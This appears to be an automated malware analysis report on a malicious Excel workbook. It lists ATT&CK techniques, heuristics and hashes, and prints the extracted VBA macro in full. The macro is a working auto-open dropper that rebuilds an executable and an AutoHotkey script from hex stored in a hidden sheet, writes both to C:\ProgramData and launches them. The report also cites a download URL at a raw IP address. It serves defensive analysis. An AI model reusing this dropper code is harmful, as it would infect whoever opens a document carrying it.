MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Excel document containing VBA macros. The `auto_open` macro is designed to write two files, `AutoHotkeyU32.exe` and `AutoHotkeyU32.ahk`, to `C:\ProgramData\` and then execute them. The script also contains a URL, `http://185.70.186.145/7773/index.php`, which is likely used to download the second-stage payload. The presence of `Shell()` calls and the overall structure strongly indicate a downloader or dropper functionality.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6940774-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6940774-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEETExcel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3671 bytes |
SHA-256: 5f3a998d478bf44c91b071c0f41ddb258586f79884ad675b66159d51369c7239 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub auto_open()
Dim sh As Worksheet
Dim rw As Range
Set sh = Sheets(" ")
Dim handle As Long
handle = FreeFile
Open "C:\ProgramData\AutoHotkeyU32.exe" For Binary As #1
Dim hextext As String
Dim bytes() As Byte
ReDim bytes(0)
Dim byteLength As Long
For Each rw In sh.Rows
hextext = sh.Cells(rw.Row, 24).Value
If hextext = "" Then
Exit For
End If
For y = 1 To Len(hextext)
byteLength = UBound(bytes)
ReDim Preserve bytes(byteLength + 1)
bytes(byteLength) = Val("&h" & Mid(hextext, y, 2))
y = y + 1
Next y
Next rw
ReDim Preserve bytes(byteLength)
Put #1, , bytes
Close #1
Set sh = Sheets(" ")
handle = FreeFile
Open "C:\ProgramData\AutoHotkeyU32.ahk" For Binary As #1
ReDim bytes(0)
For Each rw In sh.Rows
hextext = sh.Cells(rw.Row, 25).Value
If hextext = "" Then
Exit For
End If
For y = 1 To Len(hextext)
byteLength = UBound(bytes)
ReDim Preserve bytes(byteLength + 1)
bytes(byteLength) = Val("&h" & Mid(hextext, y, 2))
y = y + 1
Next y
Next rw
ReDim Preserve bytes(byteLength)
Put #1, , bytes
Close #1
Dim strProgramName As String
Dim strArgument As String
strProgramName = "C:\ProgramData\AutoHotkeyU32.exe"
strArgument = "C:\ProgramData\AutoHotkeyU32.ahk"
Call Shell("""" & strProgramName & """ """ & strArgument & """", vbNormalFocus)
End Sub
Sub show_document()
On Error Resume Next
ActiveSheet.Shapes.SelectAll
Selection.Delete
On Error GoTo 0
End Sub
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист6"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Worksheet____1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Workbook________"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Worksheet____6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 19456 bytes |
SHA-256: 2d1d0c25ab0cf9bb897664cf245be7297a6435288f5bc23ca79892d3a4f5320e |
|||
|
Detection
ClamAV:
Doc.Dropper.Agent-6940774-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.